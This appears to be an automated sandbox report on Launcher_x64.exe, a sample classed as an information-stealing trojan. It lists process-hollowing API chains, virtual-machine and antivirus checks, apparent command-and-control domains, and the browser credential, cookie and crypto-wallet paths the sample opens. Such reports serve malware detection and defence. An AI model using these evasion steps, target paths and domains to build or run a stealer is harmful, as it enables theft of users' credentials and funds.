                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: C:\Users\user\Desktop\Launcher_x64.exe Code function: 3_2_00432580 OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
                Source: C:\Users\user\Desktop\Launcher_x64.exe Code function: 3_2_00432740 GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00413DD0 appears 66 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D166A0 appears 100 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D241C4 appears 34 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00D1F55E appears 42 times
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: String function: 00407EC0 appears 55 times
                Source: Launcher_x64.exe, 00000000.00000000.1721196116.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000003.00000000.1729614724.0000000000D91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exe, 00000003.00000003.1729885980.0000000002894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exeBinary or memory string: OriginalFilenameRpcPing.exej% vs Launcher_x64.exe
                Source: Launcher_x64.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Launcher_x64.exeStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@11/3
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00437A30 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00437A30
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
                Source: Launcher_x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Launcher_x64.exe, 00000003.00000003.2457904734.0000000003627000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458531560.00000000035F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Launcher_x64.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile read: C:\Users\user\Desktop\Launcher_x64.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeSection loaded: version.dllJump to behavior
                Source: Launcher_x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Launcher_x64.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D167C3 push ecx; ret 0_2_00D167D6
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D167C3 push ecx; ret 2_2_00D167D6
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043D990 push eax; mov dword ptr [esp], E9E8E7B6h3_2_0043D995
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_00443B71 pushfd ; iretd 3_2_00443B9E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043AD00 push eax; mov dword ptr [esp], 898A8B8Ch3_2_0043AD0F
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Launcher_x64.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21816
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 5928Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exe TID: 5928Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D29126
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29075 FindFirstFileExW,2_2_00D29075
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D29126
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2603116855.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2603116855.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Launcher_x64.exeBinary or memory string: VMCIH
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPx
                Source: C:\Users\user\Desktop\Launcher_x64.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 3_2_0043C390 LdrInitializeThunk,3_2_0043C390
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D1F2B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D3F19E mov edi, dword ptr fs:[00000030h]0_2_00D3F19E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D016C0 mov edi, dword ptr fs:[00000030h]0_2_00D016C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D016C0 mov edi, dword ptr fs:[00000030h]2_2_00D016C0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D24ABC GetProcessHeap,0_2_00D24ABC
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D1616C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D1651C SetUnhandledExceptionFilter,0_2_00D1651C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D16528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D16528
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D1616C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D1F2B0
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D1651C SetUnhandledExceptionFilter,2_2_00D1651C
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 2_2_00D16528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D16528

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D3F19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00D3F19E
                Source: C:\Users\user\Desktop\Launcher_x64.exeMemory written: C:\Users\user\Desktop\Launcher_x64.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                Source: Launcher_x64.exe, 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D283DF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D243A7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D286CB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D28630
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D2897D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D2891E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D28A9D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,0_2_00D28A52
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D28B44
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D28C4A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,0_2_00D23EAC
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D283DF
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D243A7
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D286CB
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D28630
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D2897D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D2891E
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D28A9D
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: EnumSystemLocalesW,2_2_00D28A52
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D28B44
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D28C4A
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: GetLocaleInfoW,2_2_00D23EAC
                Source: C:\Users\user\Desktop\Launcher_x64.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeCode function: 0_2_00D17110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D17110
                Source: C:\Users\user\Desktop\Launcher_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Launcher_x64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Launcher_x64.exe, 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Launcher_x64.exe, 00000003.00000002.2611002767.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Launcher_x64.exe, 00000003.00000003.2530449435.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
